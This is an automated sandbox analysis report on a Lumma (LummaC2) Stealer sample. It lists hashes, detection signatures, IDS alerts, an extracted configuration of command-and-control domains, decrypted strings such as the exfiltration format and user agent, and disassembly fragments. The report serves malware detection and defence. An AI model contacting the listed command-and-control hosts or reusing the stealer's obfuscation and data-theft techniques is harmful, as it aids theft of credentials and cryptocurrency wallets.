Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
66DJ2wErLz.exe

Overview

General Information

Sample name:66DJ2wErLz.exe
renamed because original name is a hash value
Original sample name:2c0a5976c7d6d86506eb825c8d67a8b8.exe
Analysis ID:1576846
MD5:2c0a5976c7d6d86506eb825c8d67a8b8
SHA1:55a8ad3d92a5a57f075de40cc3a6391dba279ec1
SHA256:580b4b31b7215eb5fff2396e350607376de72afef4b3a7e3d841e14081f5e9cb
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 66DJ2wErLz.exe (PID: 2248 cmdline: "C:\Users\user\Desktop\66DJ2wErLz.exe" MD5: 2C0A5976C7D6D86506EB825C8D67A8B8)
    • WerFault.exe (PID: 7504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["deafeninggeh.biz", "debonairnukk.xyz", "immureprech.biz", "sordid-snaked.cyou", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.2375210203.0000000000AC9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xf00:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0.3.66DJ2wErLz.exe.2550000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0.2.66DJ2wErLz.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.3.66DJ2wErLz.exe.2550000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.66DJ2wErLz.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:06.087826+010020283713Unknown Traffic192.168.2.649718178.62.201.34443TCP
                  2024-12-17T16:42:10.008763+010020283713Unknown Traffic192.168.2.64972445.77.249.79443TCP
                  2024-12-17T16:42:14.462510+010020283713Unknown Traffic192.168.2.64974023.55.153.106443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:06.590509+010020546531A Network Trojan was detected192.168.2.649718178.62.201.34443TCP
                  2024-12-17T16:42:11.213949+010020546531A Network Trojan was detected192.168.2.64972445.77.249.79443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:06.590509+010020498361A Network Trojan was detected192.168.2.649718178.62.201.34443TCP
                  2024-12-17T16:42:11.213949+010020498361A Network Trojan was detected192.168.2.64972445.77.249.79443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:10.008763+010020582151Domain Observed Used for C2 Detected192.168.2.64972445.77.249.79443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:06.087826+010020582231Domain Observed Used for C2 Detected192.168.2.649718178.62.201.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:12.177407+010020582101Domain Observed Used for C2 Detected192.168.2.6576761.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:06.595031+010020582141Domain Observed Used for C2 Detected192.168.2.6555511.1.1.153UDP
                  2024-12-17T16:42:07.592179+010020582141Domain Observed Used for C2 Detected192.168.2.6555511.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:11.688114+010020582161Domain Observed Used for C2 Detected192.168.2.6568121.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:11.452171+010020582181Domain Observed Used for C2 Detected192.168.2.6589741.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:11.226709+010020582201Domain Observed Used for C2 Detected192.168.2.6557801.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:03.273158+010020582221Domain Observed Used for C2 Detected192.168.2.6594601.1.1.153UDP
                  2024-12-17T16:42:04.265761+010020582221Domain Observed Used for C2 Detected192.168.2.6594601.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:03.048324+010020582261Domain Observed Used for C2 Detected192.168.2.6556581.1.1.153UDP
                  2024-12-17T16:42:12.402511+010020582261Domain Observed Used for C2 Detected192.168.2.6638851.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:11.917702+010020582361Domain Observed Used for C2 Detected192.168.2.6534541.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:06.091017+010028225211Domain Observed Used for C2 Detected178.62.201.34443192.168.2.649718TCP
                  2024-12-17T16:42:10.166034+010028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.649724TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T16:42:15.505689+010028586661Domain Observed Used for C2 Detected192.168.2.64974023.55.153.106443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://awake-weaves.cyou/apiusAvira URL Cloud: Label: malware
                  Source: https://wrathful-jammy.cyou/tucuAvira URL Cloud: Label: malware
                  Source: https://debonairnukk.xyz/apiowAvira URL Cloud: Label: malware
                  Source: https://sordid-snaked.cyou/apiamAvira URL Cloud: Label: malware
                  Source: https://sordid-snaked.cyou/Avira URL Cloud: Label: malware
                  Source: https://sordid-snaked.cyou/apiVAvira URL Cloud: Label: malware
                  Source: 0.3.66DJ2wErLz.exe.2550000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "debonairnukk.xyz", "immureprech.biz", "sordid-snaked.cyou", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
                  Source: 66DJ2wErLz.exeReversingLabs: Detection: 57%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 66DJ2wErLz.exeJoe Sandbox ML: detected
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeUnpacked PE file: 0.2.66DJ2wErLz.exe.400000.0.unpack
                  Source: 66DJ2wErLz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.6:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49740 version: TLS 1.2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_0043CD60
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, edx0_2_0040BDC9
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp al, 2Eh0_2_00426054
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp eax0_2_00426054
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05D
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05D
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B068
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B068
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0040E83B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0040A940
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, ecx0_2_0040A940
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0040C917
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp ecx0_2_0043C1F0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00425990
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ecx, di0_2_00425990
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B195
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_0043B9A1
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_004369A0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0041E9B0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004299B0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_0042526A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ebx, edi0_2_0041D270
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov esi, eax0_2_00423A34
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_0043D2F0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_0043D2F0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp ecx0_2_0043C280
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_00415298
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00415298
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0043AAB2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_004252BA
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_004252BA
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov eax, ebx0_2_0041CB05
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_0043CB20
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, eax0_2_00427326
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_004143C2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]0_2_004143C2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042A3D0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0042C45C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00436C00
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4FC
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0042B4FC
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_00418578
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, eax0_2_0042750D
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00421D10
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0040DD25
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_00417582
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_00427DA2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_004205B0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C64A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0042AE48
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp eax0_2_00426E50
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4F7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0042B4F7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0042AE24
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00433630
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C6E4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00425E90
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_0043CE90
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004166A0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041BEA0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_0042ADF4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov eax, edx0_2_0041C6BB
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp eax0_2_0043BF40
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00415F66
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_0043A777
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00409700
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00409700
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00409700
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C726
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C735
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0040CFF3
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0040CFF3
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0041DF80
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A0B0AF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A0B08B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp eax0_2_00A070E4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_00A1D0F7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00A060F7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, edx0_2_009EC030
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_009FE1E7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A0B05B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_00A1B2C4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_00A1B2C4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_00A1B2CF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_00A1B2CF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [edi], al0_2_009ED25A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_009ED25A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp eax0_2_00A1C268
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp al, 2Eh0_2_00A063B6
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_00A1B3FC
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_00A1B2C2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_00A1B2C2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ebx, edi0_2_009FD4D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_00A054D1
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_00A055B3
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_00A0559D
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_00A0552B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [eax], cx0_2_009FC528
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_009F554C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_009F6544
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_00A1D557
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_00A1D557
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A0C6C3
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_00A0A637
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, eax0_2_00A07797
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp ecx0_2_00A1C79B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_009F87DF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_009F77E9
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then jmp eax0_2_00A06739
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_00A0B763
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A0B763
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00A0C8B1
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00A13897
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_009F4806
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_00A00817
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_00A0B75E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A0B75E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00A0C98D
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00A0C99C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_009F99D7
